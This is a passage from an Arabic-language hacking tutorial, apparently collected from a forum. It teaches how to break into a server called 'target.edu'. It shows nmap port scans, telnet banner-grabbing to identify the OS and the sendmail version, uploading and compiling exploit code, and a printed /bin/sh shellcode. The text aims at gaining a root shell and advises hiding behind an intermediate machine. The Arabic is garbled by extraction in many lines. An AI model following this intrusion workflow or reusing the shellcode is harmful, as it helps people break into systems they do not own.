‫ﺘ ﺤﻪﻓﻲاﻟﺴﯿ ﺮﻓﯿ ﺮﻓﺎﻧﻪ ﯾﻘﻮمﺑﻔ‬ ‫ﻗﻊﺑﻔ‬ ‫اذن ‪..‬اﻟﺪﯾﻤﻮن ﻫﺬااذاﻗﺎم ﺻﺎ ﺣﺐاﻟﻤﻮ‬
‫ﺘﻘﺪﯾﻢاﻟﺨﺪﻣﻪاﻟﻤﻠﻌﻮﻧﻪ =‪D‬‬ ‫اﻟﺪﯾﻤﻮن ﻫﺬا ﻣﻦ ﺧﻼﻟﻪﺑ‬
‫و ﻫﺬهﺑﻌ ﺾاﻟﺨﺪﻣﺎ ت ﻣﻊاﻟﺒﻮرﺗﺎ تاﻟﺨﺎ ﺻﻪﺑﻬﻢ ‪..‬ﻟﻜﻦ ﻃﺒﻌﺎ ﻫﻨﺎكﻛﺜﯿﯿ ﺮ‬

‫‪FTPd‬‬ ‫‪FTP‬‬ ‫‪٢١‬‬


‫‪telnetd‬‬ ‫‪Telnet‬‬ ‫‪٢٣‬‬
‫‪(!sendmail (yes‬‬ ‫‪SMTP‬‬ ‫‪٢٥‬‬
‫‪apache‬‬ ‫‪HTTP‬‬ ‫‪٨٠‬‬
‫‪qpop‬‬ ‫‪POP3‬‬ ‫‪١١٠‬‬
‫ﺘﺼﺎرﻟﻜﻠﻤﻪ ‪daemon‬‬
‫ﺣ ﺮ ف ‪ d‬ﻓﻲا ﺧ ﺮﻛﻠﻤﻪ ‪ ftp , telnet ..etc‬ا ﺧ‬

‫ﺘﺼﻔﺢ ﻣﺜﻼ‪ www.host.net‬ﻣﺎاﻟﺬي ﯾ ﺤﺪ ث ؟؟‬ ‫ﻣﺜﺎ ل ‪:‬ﻟﻮ ﺳﯿﺎدﺗﻚﻗﻤ ﺖﺑﺰﯾﺎره ﻫﺬااﻟﻌﻨﻮان ﻣﻦ ﺧﻼ لاﻟﻤ‬
‫ﻗﻢ ‪٨٠‬‬ ‫ﻗﻊ ﻣﻦ ﺧﻼ لﺑﻮر تا ل ‪ TCP‬ر‬ ‫ﺘﺼﻔﺢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻤﻮ‬ ‫ﯾﻘﻮماﻟﻤ‬
‫ﺛﻢ ﯾﻘﻮمﺑﺎرﺳﺎ لاﻻﻣ ﺮ‬
‫‪ GET /HTTP/1.1 /index.html‬واواﻣ ﺮا ﺧ ﺮىﻛﺜﯿ ﺮه ‪..‬‬
‫ﺘﻤ ﻞاﻟﺨﺎ صﺑﺎﻟﺼﻔ ﺤﻪ ‪index.html‬‬ ‫ﻗﻊاﻟﻤﻄﻠﻮبﺑﺎرﺳﺎ لﻛﻮداﻟﻬ‬ ‫ﺛﻢﺑﻌﺪ ذاﻟﻚ ﯾﻘﻮماﻟﻤﻮ‬

‫ﺘﺎﺟﯿﻨﻪ‬
‫اﻟﺸﻲ ءاﻟﻄ ﺮﯾ ﻒانا ل ‪ daemons‬دي ﻣﻠﯿﺌﻪﺑﺎﻟﺜﻐ ﺮا تاﻻﻣﻨﯿﻪاﻟﺨﻄﯿ ﺮه ‪...‬وﻫﻮه دهاﻟﻠﻲا ﺣﻨﺎ ﻣ ﺤ‬
‫=<‬

‫ﻗﻊ ﯾﺠ ﺐانﺗﻌ ﺮ فايا ل ‪ daemons‬اﻟﻤﻮﺟﻮده ﻋ ﻞاﻟﺴﯿ ﺮﻓﯿ ﺮ ﻟﺬﻟﻚ ﯾﺠﺐ ﻋﻠﯿﻚ‬


‫ﺘ ﺮا ق ﻣﻮ‬
‫اذنﻟﻜﻲﺗﻘﻮمﺑﺎ ﺧ‬
‫انﺗﻌ ﺮ ف‬

‫‪١ ٨٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻬﺪ ف ‪...‬اذنﻛﯿ ﻒﺗ ﺤﺼ ﻞ ﻋﻰاﻟﻤﻌﻠﻮﻣﺎ ت ﻫﺬه ‪..‬‬ ‫ﺘﻮ ﺣﻪﻓﻲاﻟﺴﯿ ﺮﻓﯿ ﺮاﻟﻤﺴ‬ ‫ﻣﺎﻫﻲاﻟﻤﻨﺎﻓﺬاﻟﻤﻔ‬
‫ﺘﻬﺪ ف‬
‫ﺘﺼ ﻞﺑﺎﻟﺴﯿ ﺮﻓﯿ ﺮاﻟﻤﺴ‬ ‫ﻣﻦ ﺧﻼ ل ﻣﺎا ل‪... port scaners‬اﻟﺴﻜﺎﻧ ﺮز ﻫﻲ ﻋﺒﺎره ﻋﻦﺑ ﺮاﻣ ﺞﺗ ﺤﻮ لانﺗ‬
‫ﺘﻮ ﺣﻪ‬
‫ﻣﻦ ﺧﻼ ل ﺟﻤﯿﻊاﻟﻤﻨﺎﻓﺬ ‪..‬و ذﻟﻚﻟﻤﻌ ﺮﻓﻪاياﻟﺒﻮرﺗﺎ تاﻟﻤﻔ‬
‫ﻓﻲ ﻫﺬااﻟﺴﯿ ﺮﻓﯿ ﺮ ‪...‬اﺷﻬ ﺮ ﻫﺬااﻟﺴﻜﺎﻧ ﺮز ﻫﻲاﻻداه ‪nmap‬ﺑﻮاﺳﻄﻪ ‪ fyodor‬وﻟ ﺤﺴﻦاﻟ ﺤﻆ ﯾﻮﺟﺪ ﻧﺴﺨﻪ‬
‫ﻣﻨﻬﺎ ﺧﺎ ﺻﻪﺑﺎﻟﻮﯾﻨﺪوز و ‪!!..‬اﯾﻪ ده ‪..‬؟؟‬
‫ا ﺣﻨﺎ ﻣ ﺶاﺗﻔﻘﻨﺎ ﻧﻨﺴﻰاﻟﻮﯾﻨﺪوز ده ﺧﺎﻟ ﺺ =>‬
‫‪/http://members.lycos.co.uk/linuxdude/e3sar‬‬
‫ﻃﯿﺐ‪..‬ﺑﺎﻟﻨﺴﺒﻪﻟﻠﯿﻨﻜ ﺲ ﯾﻤﻜﻨﻨﺎان ﻧ ﺤﺼ ﻞ ﻋﻠﻰ ﻧﺴﺨﻪ ‪ nmap‬ﻋﻠﻰﻫﯿﺌﻪ ‪rpm‬‬
‫ﺘﺎﻟﻲ ‪:‬‬
‫ﺘ ﺮﻛﯿﺒﻬﺎاﺗﺒﻊاﻟ‬
‫وﻟ‬
‫‪bash-2.03$ rpm -i nmap-2.53-1.i386.rpm‬‬

‫ﻗﻊ‬
‫ﻗﻊ ‪target.edu‬ﻛﻤﺜﺎ لﻟﻤﻮ‬
‫ﺘﺨﺪماﻟﻤﻮ‬
‫ﺘﺸﻐﯿ ﻞ ‪ ..‬وان ﺷﺎ ءا ﷲ ﺳﻨ ﺤﺎو ل ﻋﻠﻰ ﻣﺪاراﻟﺪرسﺑﺎﺳ‬ ‫ﺛﻢ ﻧﻘﻮمﺑﺎﻟ‬
‫ﺘﻬﺪ ف ‪..‬‬‫ﻣﺴ‬
‫ﺘﺎﻟﻲ ‪:‬‬‫اﺗﺒﻊاﻟ‬
‫‪bash-2.03$ nmap -sS target.edu‬‬

‫( ‪Starting nmap V. 2.53 by fyodor@insecure.org‬‬


‫‪( /www.insecure.org/nmap‬‬
‫‪:(Interesting ports on target.edu (xx.xx.xx.xx‬‬
‫)‪The 1518 ports scanned but not shown below are in state: closed‬‬
‫(‬
‫‪Port‬‬ ‫‪State‬‬ ‫‪Service‬‬
‫‪tcp open‬‬ ‫‪ftp /٢١‬‬
‫‪tcp open‬‬ ‫‪telnet /٢٣‬‬
‫‪tcp open‬‬ ‫‪smtp /٢٥‬‬
‫‪tcp open‬‬ ‫‪http/٨٠‬‬
‫‪tcp open‬‬ ‫‪pop3/١١٠‬‬

‫‪Nmap run completed -- 1 IP address (1 host up) scanned in 34‬‬


‫‪seconds‬‬

‫ﺘﻮ ﺣﻪﻛﻢﺗ ﺮى!!‬ ‫ﻗﻊ وﻗﺎمﺑﻤﻌ ﺮﻓﻪاﻟﻤﻨﺎﻓﺬاﻟﻤﻔ‬ ‫اذنﻟﻘﺪﻗﺎما ل ‪ nmap‬ﺑﻌﻤ ﻞﻓ ﺤ ﺺ ﺷﺎﻣ ﻞ ﻋﻠﻰاﻟﻤﻮ‬
‫ﻗﻊ ‪target.edu‬‬ ‫اذن ﯾﻤﻜﻨﻨﺎان ﻧﻌ ﺮ فاﯾ ﻀﺎاياﻟﺨﺪﻣﺎ ت وا ل‪ daemons‬اﻟﻤﻮﺟﻮدهﻓﻲاﻟﻤﻮ‬
‫ﻗﻊ ﻣﻦا ﺣﺪ ﻫﺬااﻟﻤﻨﺎﻓﺬ ‪..‬ﻓﻜ ﺮ ﻣﻌﻲ ﻣﺎﻫﻲ ﻫﺬهاﻻداه؟؟؟‬‫ﻟﻜﻦ ﯾﻠﺰﻣﻨﺎاداه ﻣﻌﯿﻨﻪﻟﻼﺗﺼﺎ لﺑﺎﻟﻤﻮ‬
‫ﺘﻠﻨ ﺖ دﯾﻤﻮن ‪ ..‬وﻟﻜﻨﻪاﯾ ﻀﺎ ﻋﺒﺎره ﻋﻦ‬ ‫ﺘﻠﻨ ﺖ ﻫﻮه ﺧﺪﻣﻪ ‪..‬ﻣﻦ ﺧﻼ لاﻟ‬
‫ﺘﻠﻨ ﺖ ‪..‬اه ‪ ..‬ﺻ ﺤﯿﺢاناﻟ‬
‫ﻧﻌﻢاﻧﻬﺎاﻟ‬
‫ﻗﻊ ﺑﻤﻨﻔﺬ ﻣﻌﯿﻦ ﻣﻦ ﺧﻼ لا ل ‪... TCP‬ﺗﻌﺎ ل ﻧﺸﻮ ف ﻣﺜﺎ ل ‪:‬‬ ‫ﺑ ﺮﻧﺎﻣ ﺞﺑﺴﯿﻂ ‪..‬ﯾﻤﻜﻨﻚ ﻣﻦ ﺧﻼﻟﻪاﻻﺗﺼﺎ لﺑﺎي ﻣﻮ‬

‫‪bash-2.03$ telnet target.edu 21‬‬


‫‪...Trying xx.xx.xx.xx‬‬
‫‪.Connected to target.edu‬‬

‫‪١ ٨٤‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

.'[^' Escape character is


.target.edu FTP server (SunOS 5.6) ready ٢٢٠
quit
.Goodbye ٢٢١
Connection closed by foreign host

‫اﻫﺎاااا‬
(: ‫دو ل دﻟﻮﻧﺎ ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎ تﻗﯿﻤﻪاوياوي‬
SunOS 5.6 ‫ﺘﺸﻐﯿ ﻞ ﻫﻨﺎك ﻫﻮ‬ ‫ ﻧﻈﺎماﻟ‬-١
sunOS ‫اﻟﻠﻲﺑﯿﯿﺠﻲ ﻣﻊ ﻧﻈﻢاﻟﺴﻦ‬standard‫ دﯾﻤﻮناﻻ فﺗﻲﺑﻲ ﻫﻨﺎك ﻫﻮا ل‬-٢

: ‫ﺘﻠﻨ ﺖ‬
‫ﺘﺼ ﻞﺑﯿﻪ ﻣﻦاﻟ‬
‫ﺗﻌﺎ ل ﻧﺠ ﺮبﺑﻮر تﺗﺎﻧﻲ ﻧ‬

bash-2.03$ telnet target.edu 25


...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 ٢٢٠
09:18:14 -0
(EDT) ٤٠٠
quit
target.edu closing connection ٢٫٠٫٠ ٢٢١
.Connection closed by foreign host

/٨٫١١٫٠ ‫ وانا ﺻﺪاره ﻫﻮ‬sendmail ‫ ﻫﻮا ل‬smtp ‫ﺘﻔﺪﻧﺎ ﻣﻌﻠﻮﻣﺎ تﻗﯿﻤﻪ ﻫﻲان دﯾﻤﻮن‬ ‫اﯾ ﻀﺎاﺳ‬
٨٫٩٫٣
‫ﺘﻤﺪ ﻋﻠﻰ‬
‫ﺘ ﺞاﻟﻰ ﻫﺬااﻟﻤﻌﻠﻮﻣﺎ ت ؟؟ ﻻناﻻﻛﺴﺒﻠﻮﯾ ﺖ واﻟﺜﻐ ﺮهاﻟﻤﻮﺟﻮده داﺋﻤﺎﺗﻌ‬‫ ﻃﯿﺐﻟﻤﺎذا ﻧ ﺤ‬.. ‫ﺟﻤﯿ ﻞ ﺣﻤﯿ ﻞ‬
‫ﻟﻜﻦﺗﻮﺟﺪ ﻣﺸﻜﻠﻪ وﻫﻲانﺑﻌ ﺾاﻟﻤﻜﻌﻠﻮﻣﺎ تﻗﺪ ﯾﻤﻜﻦان‬.. ‫ﺘﺸﻐﯿ ﻞ‬ ‫اﻟﻤﻮﺟﻮد و ﻋﻠﻰ ﻧﻈﺎماﻟ‬daemon ‫ا ل‬
‫ﺗﻜﻮن ﻣﺰورهاو ﻏﯿ ﺮ ﺻ ﺤﯿ ﺤﻪ‬
: ‫ازاي ؟؟؟ﺗﺎﺑﻊ ﻣﻌﺎﯾﺎﻛﺪه‬
nmap ‫ﺑﺎﻻداه‬
bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org (


( /www.insecure.org/nmap
:(Interesting ports on target.edu (xx.xx.xx.xx
The 1518 ports scanned but not shown below are in state: closed)
(
Port State Service
tcp open ftp /٢١
tcp open telnet /٢٣

١ ٨٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

tcp open smtp/٢٥


tcp open http/٨٠
tcp open pop3/١١٠

TCP Sequence Prediction: Class=random positive increments


(!Difficulty=937544 (Good luck
Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34


seconds

|: ‫ﯾﺎﻧﻬﺎراﺳﻮد‬
!!!!!! ‫ﺘﺨﻤﯿﻨﻪ ﻫﻮﻟﯿﻨﻜ ﺲ‬
‫ﺘﺸﻐﯿ ﻞاﻟﻠﻲاﻻدهﻗﺎﻣ ﺖﺑ‬‫ﻧﻈﺎماﻟ‬
@= ‫ !!!!!!اه ﯾﺎ و ﻻداﻟﻜﻠﺐ‬sunOS ‫ﻣ ﺶﻛﺎن‬

‫ﻟﻜﻦ ﻧﻘﺪر ﻧﻘﻮ لاناﻟﻤﻌﻠﻮﻣﺎ تاﻟﻠﻲ ﺟﻤﻌﻨﺎﻫﺎﻛﻔﺎﯾﻪ و‬.. ‫ﺑ ﺲا ﺣﻨﺎﺑ ﺮده ﻻزم ﻧﻌ ﺮ فﺗﻮزﯾﻌﻪاﻟﻠﯿﻨﻜ ﺲاﻟﻮﺟﻮده‬
‫ﻣﻤﻜﻦﺗﻤﺸﻲ‬
‫ﻗﻌﻪ‬‫ﻗﻊ وﻟﻜﻦ ﻣﻤﻜﻦا ﺣﺪاﻻدﻣﯿﻨﺰﻟﻮ ﻋ ﺮ فاناﻧﻨﺎﻗﻤﻨﺎﺑﻔ ﺤ ﺺ ﻣﻮ‬ ‫ﻛﺪها ﺣﻨﺎﻗﻤﻦﺑﻌﻤ ﻞ ﺳﻜﺎن ﻋﻠﻰاﻟﻤﻮ‬.. ‫ﻃﯿﺐ‬
‫ﺘﻘﺪ ﻧﻪ ﺣﯿﻜﻮن زﻋﻼن ﻣﻨﻦ و ﺣﻨﺎ ﻣ ﺶ ﻋﺎﯾﺰﯾﻦاﻻدﻣﯿﻦ ﯾﺰﻋ ﻞ ﻣﻨﻨﺎﻟﺬﻟﻚ‬ ‫اﻋ‬...
D= ‫ﺘﺒ ﺮ ﻋﻤ ﻞ ﺷ ﺮﻋﻲ ﻻ ﻣﺸﺎﻛ ﻞﻓﯿﻪ‬‫ﻗﻊ ﯾﻌ‬ ‫ ﻋﻠﻰاي ﺣ ﻞﻓﺎن ﻋﻤ ﻞ ﺳﻜﺎنﻟﻤﻮ‬Ss- ‫ﺘﯿﺎر‬ ‫ﺘﺨﺪﻣﻨﺎاﻻ ﺧ‬ ‫اﺳ‬
:‫ﻟﻤﺰﯾﺪ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت راﺟﻊ‬
bash-2.03$ man nmap

.. ‫رﻓﻊادواﺗﻚ ﻋﻠﻰ ﺷ ﻞاﻛﻮﻧ ﺖ‬


( ‫ﺘ ﺮ ق ﻣﻦ ﺟﻬﺎزك‬
‫)ﻫﺬهاﻟﺨﻄﻮهاذاﻛﻦ ﻋﻨﺪك ﺷﯿ ﻞاﻛﺎوﻧ ﺖ و ﻣ ﺶ ﻋﺎﯾﺰﺗﺨ‬
: ‫ﺘﺎﻟﻲ‬
‫اﺗﺒﻊاﻟ‬
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com
.shell.com FTP server (SunOS 5.6) ready ٢٢٠
Name: luser
.Password required for luser ٣٣١
:Password
.User luser logged in ٢٣٠
ftp> put program.c
.PORT command successful ٢٠٠
.(ASCII data connection for program.c (204.42.253.18,57982 ١٥٠
.Transfer complete ٢٢٦
ftp> quit
Goodbye ٢٢١

١ ٨٦
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻃﺒﻌﺎﻫﺬهاﻟﻄ ﺮﯾﻘﻪ ن ﺧﻼ لا‪ftp‬‬


‫و ﻫﻲ ﻏﯿ ﺮ ﻣ ﺤﺒﺒﻪ ﻻﻧﻬﺎﺗﻘﻮمﺑﻌﻤ ﻞ ﻣﻠﻔﺎ تاﻟﻠﻮجﻟﺬﻟﻚ ﯾﻔ ﻀ ﻞﻟﻚانﺗﻘﻮمﺑﻨﺴﺢ ﺳﻮرسﻛﻮداﻻﻛﺴﺒﻠﻮﯾ ﺖ و‬
‫ﻟﺼﻘﻬﺎﻓﻲ ﻣﻠ ﻒﻓﻲاﻟﺸﯿ ﻞ ‪.‬‬
‫‪sh-2.03$ vi exploit.c‬‬
‫ﺘﺪاد‪c.‬‬
‫ﺘﺢ ﺗﯿ ﺮﻣﯿﻨﺎ لﺗﺎﻧﻲ واﺗﺼ ﻞﺑﺎﻟﺸﯿ ﻞ واﻟﺼ ﻖاﻟﻜﻮدﻓﻲ ﻣﻠ ﻒ و ﺳﻤﯿﻪﺑﺎﻣ‬ ‫ﺛﻢاﻧﺴ ﺦاﻟﻜﻮدﺛﻢاﻓ‬
‫ﺘﻚﻟﻠﺸﯿ ﻞاﻛﺎوﻧ ﺖ ‪.‬‬
‫ﺘﺎﻋ‬‫ﻛﺪهاﻧ ﺖ رﻓﻌ ﺖاﻻﻛﺴﺒﻠﻮﯾ ﺖﺑ‬
‫ﺘﻬﺪ ف‬‫وﻛﻮﻣﺒﺎﯾ ﻞﻟﻼﻛﺴﺒﻠﻮﯾ ﺖ وﺑﻌﺪﯾﻦاﻋﻤﻠﻬﺎ رن ﻋﻠﻰاﻟﻬﻮﺳ ﺖاﻟﻤﺴ‬
‫‪sh-2.03$ gcc program.c -o program‬‬
‫‪sh-2.03$ ./program‬‬

‫ﻣﻠ ﺤﻮﻇﻪ ‪ :‬ﻋﯿﺐاوياﻧﻚﺗﺎ ﺧﺪاﻻﻣ ﺮﯾﻦ دو لﻛﻘﺎﻋﺪه ﻣﺴﻠﻢﺑﯿﻬﺎ‪..‬ﻛ ﻞاﻛﺴﺒﻠﻮد وﻟﻪاواﻣ ﺮهاﻟﺨﺎ ﺻﻪﻓﻲ‬
‫ﺘﺸﻐﯿ ﻞ‬‫اﻟﻜﻮﻣﺒﺎﯾ ﻞ وﻟﻪ ﻃ ﺮﯾﻘﻪﻓﻲاﻟ‬
‫ﺘﻌﻠﯿ ﻖاﻟﺒ ﺮﻣﺠﻲاوﻓﻲا ل‪. usage‬‬ ‫ﺗﻈﻬ ﺮﻫﺬااﻟﻄ ﺮﯾﻘﻪﻓﻲاﻟ‬

‫ﺘﻠﻔﻪ ‪-:‬‬‫ﺘﻐﻼ لاﻟﺜﻐ ﺮا تاﻟﻤﺨ‬ ‫‪-‬اﺳ‬


‫ﺘﻬﺪ ف واﯾ ﻀﺎاﻟﺪﯾﻤﻮﻧﺰ‬ ‫ﻗﻊاﻟﻤﺴ‬ ‫ﺘﺸﻐﯿ ﻞ ﻋﻨﺪاﻟﻤﻮ‬ ‫ﻫﺬااﻫﻢ ﺟﺰاﻓﻲاﻟﻤﻮ ﺿﻮ ع ‪.‬ﺑﻤﺠ ﺮدانﺗﻌ ﺮ ف ﻣﺎﻫﻮ ﻧﻈﺎماﻟ‬
‫اﻟﺸﻐﺎﻟﻪ ﻋﻠﻰاﻟﺴﯿ ﺮﻓﯿ ﺮ‬
‫ﺘ ﺮﻧ ﺖ‬
‫ﺘﻘﺪماﻛﺴﺒﻠﻮﯾ ﺖ ‪..‬و دي ﻣﻮﺟﻮدهﺑﻜﺜ ﺮه ﻋﻠﻰاﻻﻧ‬ ‫ﻓﯿﻤﻜﻨﻚانﺗﺬﻫﺐاﻟﻰاي دﺗﺎﺑﯿﺰاﻟﻠﻲﺑ‬
‫‪http://www.linux.com.cn/hack.co.za‬‬
‫ﺘﺨﯿﻠﻪ ‪..‬ﻣﻘﺴﻤﻪاﻟﻰ دﯾﻤﻮﻧﺎ ت و ﻧﻈﻢﺗﺸﻐﯿ ﻞ‬ ‫ﻣﺜﻼ دهﻓﯿﻪﻛ ﻞ ﺣﺎﺟﻪ ﻣﻤﻜﻦﺗ‬
‫وﻟﻜﻦ ‪..‬ﻣﺎﻫﻲاﻻﻛﺴﺒﻠﻮﯾ ﺖ ؟؟‬
‫ﺘﻮبﻓﺒﻠﻐﻪاﻟﺴﻲاواﻟﺒﯿ ﺮ لاﻟﻤﻬﻢان‬ ‫اﻻﻛﺴﺒﻠﻮﯾ ﺖ ﻋﺒﺎره ﻋﻦ ﺳﻮرسﻛﻮد ﻋﺎده ﻣﻜ‬
‫ﺘﻐﻼ ل ﻣﻨﻄﻘﻪ ﻣﻌﯿﻨﻪﻓﻲاﻟﺴﯿ ﺮﻓﯿ ﺮ ‪..‬ﻓﻲ ﺣﺎﻟﻪ ‪TARGET.EDU‬‬ ‫اﻻﻛﺴﺒﻠﻮﯾ ﺖ ديﺗﻘﻮمﺑﺎﺳ‬
‫ﺘﺨﺪماﻻﻛﺴﺒﻠﻮﯾ ﺖاﻟﺨﺎﺻﻪ ب ‪ sendmail 8.11.0‬اواي دﯾﻤﻮنا ﺧ ﺮ‬ ‫ﯾﻤﻜﻨﻨﺎان ﻧﺴ‬
‫ﺘ ﺮا ق ‪..‬ﻣ ﺶ ﻋﺎر فاﯾﻪ‬ ‫ﻋﻠﻰﻓﻜ ﺮهاﻟﻌﯿﺎ ل دﯾﻤﺎاﺳﻤﻌﻬﻢ ﯾﻘﻮﻟﻮااناﻟﺴﻨﺪ ﻣﯿ ﻞ ﻫﻮاﻛﺒ ﺮ دﯾﻤﻮن ﻣﻌ ﺮ ضﻟﻼ ﺧ‬
‫اﻟﺴﻨﺪ ﻣﯿ ﻞاﺳﺎﺳﺎ ؟؟‬
‫ﻃﯿﺐ روو حﻟﻠﺪرس ده و ﻧ ﺖﺗﻌ ﺮ ف ‪:‬‬
‫‪http://www.pharaonics.net/less/NEtworks/124.htm‬‬
‫ﺘﻌﻮد ﻋﻠﯿﻚ ) ﻏﯿ ﺮ ﻃﺒﻌﺎ‬‫ﻓﯿﻪ ﺣﺎﺟﻪﻻزمﺗﻌ ﺮﻓﻬﺎ ‪.‬انﻟﻤﺎﺗﺸﻐ ﻞاﻛﺴﺒﻠﻮﯾ ﺖ ﻋﻠﻰ ﺳﯿ ﺮﻓﯿ ﺮ ﻣﻌﯿﻦ ‪..‬اﯾﻪاﻟﻔﻮاﺋﺪاﻟﻠﻲ ﺟ‬
‫ﻗﻊ (‬‫ﺘ ﺮا قاﻟﻤﻮ‬
‫اﺧ‬
‫ﺘﯿﻦاﺗﻨﯿﻦ ‪..‬او ل ﺣﺎﺟﻪ ﺷﯿ ﻞ ﻋﺎدي ‪....‬‬ ‫ﺘ ﺤﺼ ﻞ ﻋﻠﻰ ﺣﺎﺟ‬ ‫ﺣ‬
‫ﺗﺎﻧﻲ ﺣﺎﺟﻪ و دهاﻟﻤﻬﻢﺑﺎﻟﻨﺴﺒﻪﻟﻨﺎ ﻣﺎﯾﺴﻤﻰﺑﺎﻟ ﺮوو ت ﺷﯿ ﻞ ‪..‬‬
‫ﺘﻠﻚﻛﻔﻪاﻟﺼﻼ ﺣﯿﺎ ت و ﻣﻤﻜﻦﺗﻌﻤ ﻞﻛ ﻞاﻟﻠﻲ‬ ‫ﻃﺒﻌﺎاﻧ ﺖﻟﻮا ﺧﺪ ت روو ت ﺷﯿ ﻞ ﻋﻠﻰاﻟﺴﯿ ﺮﻓﯿ ﺮاذنﻓﺎﻧ ﺖﻛﺪهﺗﻤ‬
‫ﺘﻌﻤ ﻞاﻟ ﺮوو ت ﺷﯿ ﻞ دهﻛﺠﻬﺎز و ﺳﯿﻂ زي ﻣﺎﻗﻠ ﺖﻓﻲاو لاﻟﺪرس‬ ‫اﻧ ﺖ ﻋﺎﯾﺰه ‪..‬ﻣﻤﻜﻦﺗﺴ‬

‫ﺘﺎ ت ﻫﻲ ‪www.securityfocus.com :‬‬


‫دﺗﺎﺑﯿﺰ ﺻﻐﯿ ﺮهﻟﻼﻛﺴﺒﻠﻮﯾ‬
‫‪www.insecure.org/sploits.html‬‬

‫ﺘﻌﻠﯿﻘﺎ تاذا‬
‫ﺘﺎﻋﻬﺎاواﻟ‬
‫ﺘﻠﻔﻪ ﻋﻦاﻻ ﺧ ﺮى و ﯾﺠﺐ ﻋﻠﯿﻚانﺗﻘ ﺮااﻟﻜﻮدﺑ‬ ‫‪ ..‬ﻃﯿﺐ زي ﻣﺎﻗﻠ ﺖانﻛ ﻞاﻛﺴﺒﻠﻮﯾ ﺖ ﻣﺨ‬
‫ﻛﻨ ﺖ ﻻﺗﻔﻬﻢﻓﻲﻟﻐﻪاﻟﺒ ﺮﻣﺠﻪ ‪..‬‬
‫ﺘﺎ تﻫﻲاﻟﺒﻔ ﺮاوﻓ ﺮﻓﻠﻮ ‪ ...‬ﯾﻘﻮم ﻫﺬهاﻻﻛﺴﺒﻠﻮﯾ ﺖﺑﻌﻤ ﻞ ) درﺑﻜﻪﻓﻲاﻟﺪﯾﻤﻮن (‬ ‫ﻣﻦاﺳﻬ ﻞ واﺷﻬ ﺮاﻻﻛﺴﺒﻠﻮﯾ‬
‫ﻣﻢ ﯾﺆدياﻟﻰﺗﺸﻐﯿ ﻞاﻟﻜﻮداﻟﺬيﺗ ﺮﯾﺪه‬

‫‪١ ٨٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺸﻐﯿ ﻞ ﺷﯿ ﻞﻓﻲاﻟﺴﯿ ﺮﻓﯿ ﺮﻟﺬﻟﻚﻓﻬﻮ ﯾﺴﻤﻰ ﺷﯿ ﻞﻛﻮد‪shell code‬‬ ‫ﯾﻘﻮمﻫﺬااﻟﻜﻮدﺑ‬


‫ﺘﺨﺪمﻓﻲاﻟﺴﯿ ﺮﻓﯿ ﺮ‬‫ﺘﺸﻐﯿ ﻞاﻟﻤﺴ‬
‫ﺘﺸﻐﯿ ﻞ ‪..‬ﻟﺬﻟﻚ ﯾﺠﺐ ﻋﻠﯿﻨﺎان ﻧﻌ ﺮ ف ﻧﻈﻢاﻟ‬‫ﺘﻠ ﻒﻫﺬااﻟﻜﻮدﺗﺒﻌﺎﻟﻨﻈﺎماﻟ‬ ‫ﻃﺒﻌﺎ ﯾﺨ‬
‫ﻗﻲ ده‬ ‫ﻟﻮ ﺷﻮﻓﻨﺎﻛﻮداﻛﺴﺒﻠﻮﯾ ﺖ ﻣﻌﯿﻨﻪ ﻣﻤﻜﻦ ﻧﻼ‬
‫‪= []char shellcode‬‬
‫"\‬
‫‪"xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b‬‬
‫"\‬
‫‪"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd‬‬
‫؛‬
‫"\‪"x80\xe8\xdc\xff\xff\xff/bin/sh‬‬

‫ﺘﺸﻐﯿ ﻞاﻟﺸﯿ ﻞاﻟﻠﻲﻓﻲاﻟﻤﺴﺎر دﻫﻪ ‪bin/sh/‬‬ ‫اﻫﺎ‪..‬دﻫﻪﻟﻠﯿﻨﻜ ﺲ و ﯾﻘﻮمﺑ‬


‫ﺘﺎﻋﻚ ﺷﻐﺎ ل ﻋﻠﻰ ﻧﻈﺎمﺗﺸﻐﯿ ﻞا ﺧ ﺮاذن ﯾﺠﺐ ﻋﻠﯿﻚانﺗﻐﯿ ﺮاﻟﺸﯿ ﻞﻛﻮد‬ ‫ﻃﺒﻌﺎﻟﻮاﻟﺴﯿ ﺮﻓﯿ ﺮﺑ‬
‫ﻗﻊ‬ ‫ﺘﺸﻐﯿ ﻞﻓﻲ ﻣﻮا‬‫ﻗﻲ ﺷﯿ ﻞﻛﻮدسﻟﺠﻤﯿﻊ ﻧﻈﻢاﻟ‬ ‫ﺘﻬﺪ ف ‪ ..‬ﻃﺒﻌﺎ ﻣﻤﻜﻦﺗﻼ‬‫دهاﻟﻰا ﺧ ﺮ ﯾﻨﺎﺳﺐاﻟﻨﻈﺎماﻟﻤﺴ‬
‫ﺘﻠﻔﻪ‪.‬‬
‫اﻟﺴﯿﻜﯿﻮرﺗﻲاﻟﻤﺨ‬
‫‪...‬‬
‫ﺘﺨﺪم ﺟﻬﺎزا وﺳﯿﻄﺎاو ﺷﯿ ﻞ‬‫ﺘ ﺮا ق ‪ ..‬واﻧﻤﺎﺗﺴ‬
‫ﺘﻌﻤﻠ ﺶ ﺟﻬﺎزكﻓﻲاﻻ ﺧ‬ ‫ﺘﺴ‬
